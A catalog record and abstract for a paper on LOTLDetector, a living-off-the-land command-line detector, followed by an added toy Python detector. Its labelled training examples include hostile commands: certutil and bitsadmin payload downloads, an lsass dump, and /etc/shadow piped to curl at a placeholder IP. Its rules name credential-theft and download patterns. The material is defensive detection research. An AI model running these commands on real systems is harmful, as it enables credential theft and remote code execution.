Lotldetector: living off the land attacks detection system based on feature fusion
Saved in:
| Published in: | Cybersecurity vol. 9, no. 1 (Dec 2026), p. 4 |
|---|---|
| Main author: | Zhu, Tiantian |
| Other authors: | Zheng, Jie; Chen, Tieming; Lv, Mingqi; Xiong, Chunlin; Weng, Zhengqiu; Zheng, Xiangyang |
| Published: | Springer Nature B.V., Dec 2026 |
| Subjects: | Datasets; Semantics; Malware; Natural language processing; Deep learning; Algorithms; Neural networks; Linux; Tags; Network computers |
| Online access: | [Citation/Abstract](https://www.proquest.com/docview/3290061051/abstract/embedded/7BTGNMKEMPT1V9Z2?source=fedsrch), [Full Text](https://www.proquest.com/docview/3290061051/fulltext/embedded/7BTGNMKEMPT1V9Z2?source=fedsrch), [Full Text - PDF](https://www.proquest.com/docview/3290061051/fulltextPDF/embedded/7BTGNMKEMPT1V9Z2?source=fedsrch) |
MARC
| Tag | Ind. | Content |
|---|---|---|
| LEADER | | 00000nab a2200000uu 4500 |
| 001 | | 3290061051 |
| 003 | | UK-CbPIL |
| 022 | | $a 2523-3246 |
| 024 | 7 | $a 10.1186/s42400-025-00531-w $2 doi |
| 035 | | $a 3290061051 |
| 045 | 2 | $b d20261201 $b d20261231 |
| 100 | 1 | $a Zhu, Tiantian $u Zhejiang University of Technology, College of Computer Science and Technology, Hangzhou, China (GRID:grid.469325.f) (ISNI:0000 0004 1761 325X) |
| 245 | 1 | $a Lotldetector: living off the land attacks detection system based on feature fusion |
| 260 | | $b Springer Nature B.V. $c Dec 2026 |
| 513 | | $a Journal Article |
| 520 | 3 | $a In recent years, Living off the Land (LotL) attacks have drawn attention because of their flexibility and the difficulty of detecting them. These attacks abuse legitimate tools already present on the system to carry out malicious activity, hiding malicious intent behind normally benign programs. Existing detection methods for such attacks rely largely on expert rules. While rule tags effectively detect known attacks, they also produce a high false positive rate, which lowers the overall detection accuracy of rule-based models. To address these issues, we propose a detection system called LOTLDetector, which combines deep learning with expert rules to detect malicious command lines in LotL attacks from both the data and the knowledge perspective. LOTLDetector learns the semantics of command-line text with a neural network and fuses them with rule tags derived from expert knowledge, enabling more comprehensive detection of LotL attacks. We evaluated the method extensively on a Windows dataset of 27,448 command lines and a Linux dataset of 27,093 command lines and compared it with existing methods. The results show that our method significantly outperforms existing methods at detecting malicious command lines: on the Linux dataset the system reached an accuracy of 0.9728, and on the Windows dataset an accuracy of 0.9598, about 8% higher than the best existing method. The project is open-sourced at https://github.com/csedikaf/LOTLDetector. |
| 653 | | $a Datasets |
| 653 | | $a Semantics |
| 653 | | $a Malware |
| 653 | | $a Natural language processing |
| 653 | | $a Deep learning |
| 653 | | $a Algorithms |
| 653 | | $a Neural networks |
| 653 | | $a Linux |
| 653 | | $a Tags |
| 653 | | $a Network computers |
| 700 | 1 | $a Zheng, Jie $u Zhejiang University of Technology, College of Computer Science and Technology, Hangzhou, China (GRID:grid.469325.f) (ISNI:0000 0004 1761 325X) |
| 700 | 1 | $a Chen, Tieming $u Zhejiang University of Technology, College of Computer Science and Technology, Hangzhou, China (GRID:grid.469325.f) (ISNI:0000 0004 1761 325X) |
| 700 | 1 | $a Lv, Mingqi $u Zhejiang University of Technology, College of Computer Science and Technology, Hangzhou, China (GRID:grid.469325.f) (ISNI:0000 0004 1761 325X) |
| 700 | 1 | $a Xiong, Chunlin $u China Unicom (Guangdong) Industrial Internet Company Ltd., Guangzhou, China (GRID:grid.469325.f) |
| 700 | 1 | $a Weng, Zhengqiu $u Wenzhou University of Technology, School of Data Science and Artificial Intelligence, Wenzhou, China (GRID:grid.469325.f) (ISNI:0000 0005 1164 4044) |
| 700 | 1 | $a Zheng, Xiangyang $u Wenzhou University of Technology, School of Data Science and Artificial Intelligence, Wenzhou, China (GRID:grid.469325.f) (ISNI:0000 0005 1164 4044) |
| 773 | 0 | $t Cybersecurity $g vol. 9, no. 1 (Dec 2026), p. 4 |
| 786 | 0 | $d ProQuest $t Publicly Available Content Database |
| 856 | 4 1 | $3 Citation/Abstract $u https://www.proquest.com/docview/3290061051/abstract/embedded/7BTGNMKEMPT1V9Z2?source=fedsrch |
| 856 | 4 0 | $3 Full Text $u https://www.proquest.com/docview/3290061051/fulltext/embedded/7BTGNMKEMPT1V9Z2?source=fedsrch |
| 856 | 4 0 | $3 Full Text - PDF $u https://www.proquest.com/docview/3290061051/fulltextPDF/embedded/7BTGNMKEMPT1V9Z2?source=fedsrch |
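The design point in the abstract, fusing features learned from command-line text with expert rule tags so that a rule hit is weighed against its context instead of being trusted outright, can be shown in miniature. The block below is an added example written for this page; it is not LOTLDetector's code, model, rule set or data (those are in the linked repository). It substitutes a bag-of-tokens vector for the paper's neural text encoder, five constructed regex rule tags for the expert rules, and a plain-Python logistic-regression layer for the fusion, trained on constructed, labelled command lines.

```python
"""Toy feature-fusion detector for LotL command lines.

Added illustration for this page, not LOTLDetector's code, model or rules.
A bag-of-tokens vector stands in for the neural text encoder, five regexes
for the expert rule set, and logistic regression fuses them. Every rule and
command line below is constructed for the example.
"""
import math
import re
from collections import Counter

# Knowledge side: constructed expert rule tags (a real rule set is far larger).
RULES = [(name, re.compile(rx, re.I)) for name, rx in [
    ("encoded_powershell", r"powershell.*\s-(e|ec|enc|encodedcommand)\s"),
    ("download_cradle", r"certutil.*-urlcache|bitsadmin.*/transfer|downloadstring"
                        r"|invoke-webrequest|\bwget\b|\bcurl\b.*\s-o\b"),
    ("proxy_execution", r"\b(rundll32|regsvr32|mshta)\b"),
    ("credential_access", r"sekurlsa|lsass|/etc/shadow|mimikatz"),
    ("hidden_window", r"-w(indowstyle)?\s+hidden"),
]]

# Constructed, labelled command lines (1 = malicious, 0 = benign). The two benign
# rundll32 lines are routine Control Panel launches that a rule-only detector
# flags: the false-positive case the abstract describes.
TRAIN = [
    (r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA", 1),
    (r"powershell.exe -windowstyle hidden -encodedcommand JABjAGwAaQBlAG4AdAA=", 1),
    (r"certutil.exe -urlcache -split -f http://203.0.113.5/a.exe c:\users\public\a.exe", 1),
    (r"rundll32.exe c:\users\public\update.dll,DllRegisterServer", 1),
    (r"rundll32.exe c:\programdata\tmp.dll,Start", 1),
    (r"bitsadmin /transfer job /download /priority high http://203.0.113.5/b.exe c:\users\public\b.exe", 1),
    (r"procdump.exe -ma lsass.exe c:\users\public\lsass.dmp", 1),
    (r"cat /etc/shadow | base64 | curl -X POST -d @- http://203.0.113.5/x", 1),
    (r"rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl", 0),
    (r"rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl", 0),
    (r"cmd.exe /c dir c:\users\alice\documents", 0),
    (r"cmd.exe /c copy c:\users\alice\report.docx d:\backup", 0),
    (r"powershell.exe -command Get-Process | Sort-Object CPU", 0),
    (r"powershell.exe -command Get-ChildItem c:\users\alice\documents", 0),
    (r"notepad.exe c:\users\alice\notes.txt", 0),
    (r"ls -la /var/log", 0),
    (r"grep -i error /var/log/syslog", 0),
]


def rule_tags(cmd):
    """Names of the expert rules that fire on a command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def rule_only_verdict(cmd):
    """Baseline the abstract argues against: any rule hit means malicious."""
    return bool(rule_tags(cmd))


def tokenize(cmd):
    """Data side: lower-case, split on whitespace and commas. A crude stand-in
    for the learned encoder; a real system would also normalise paths etc."""
    return [t for t in re.split(r"[\s,]+", cmd.lower()) if t]


def sigmoid(z):
    z = max(-60.0, min(60.0, z))  # clamp so math.exp cannot overflow
    return 1.0 / (1.0 + math.exp(-z))


class FusionModel:
    """Logistic regression over [rule-tag indicators | token indicators | bias]."""

    def __init__(self, train, lr=0.1, epochs=3000, min_df=2):
        # Vocabulary = tokens seen in at least min_df training lines; one-off
        # paths and base64 blobs would only be memorised, so they are dropped.
        df = Counter(t for cmd, _ in train for t in set(tokenize(cmd)))
        self.vocab = sorted(t for t, n in df.items() if n >= min_df)
        data = [(self.features(cmd), y) for cmd, y in train]
        self.w = [0.0] * len(data[0][0])
        for _ in range(epochs):  # full-batch gradient descent on log loss
            grad = [0.0] * len(self.w)
            for x, y in data:
                err = sigmoid(sum(wj * xj for wj, xj in zip(self.w, x))) - y
                for j, xj in enumerate(x):
                    if xj:
                        grad[j] += err
            self.w = [wj - lr * g for wj, g in zip(self.w, grad)]

    def features(self, cmd):
        """Feature fusion: rule tags concatenated with the token bag."""
        tags, toks = set(rule_tags(cmd)), set(tokenize(cmd))
        return ([1.0 if name in tags else 0.0 for name, _ in RULES]
                + [1.0 if t in toks else 0.0 for t in self.vocab] + [1.0])

    def score(self, cmd):
        """Probability that the command line is malicious."""
        return sigmoid(sum(wj * xj for wj, xj in zip(self.w, self.features(cmd))))


def accuracy(model, data):
    return sum((model.score(c) > 0.5) == bool(y) for c, y in data) / len(data)


if __name__ == "__main__":
    model = FusionModel(TRAIN)
    print("training accuracy:", accuracy(model, TRAIN))
    for cmd in [r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
                r"powershell.exe -nop -w hidden -ec aQBlAHgA",
                r"wget http://203.0.113.5/c.sh -O /tmp/c.sh"]:
        print(f"{model.score(cmd):.3f}  rule-only={rule_only_verdict(cmd)}  {cmd}")
```

Run as a script, the held-out `rundll32.exe shell32.dll,Control_RunDLL desk.cpl` line is flagged by the rule-only baseline (the `proxy_execution` tag fires) but scored low by the fused model, because the `shell32.dll` and `control_rundll` tokens only ever co-occurred with benign labels; the encoded-PowerShell and wget lines keep their high scores because their rule tags are not contradicted by benign context. That is the abstract's false-positive argument for fusion at toy scale. The caveat is the usual one: a token bag this small is trivially evaded by renaming or obfuscating tokens, and the paper's claim rests on its neural encoder and its 27k-line datasets, not on anything this sketch reproduces.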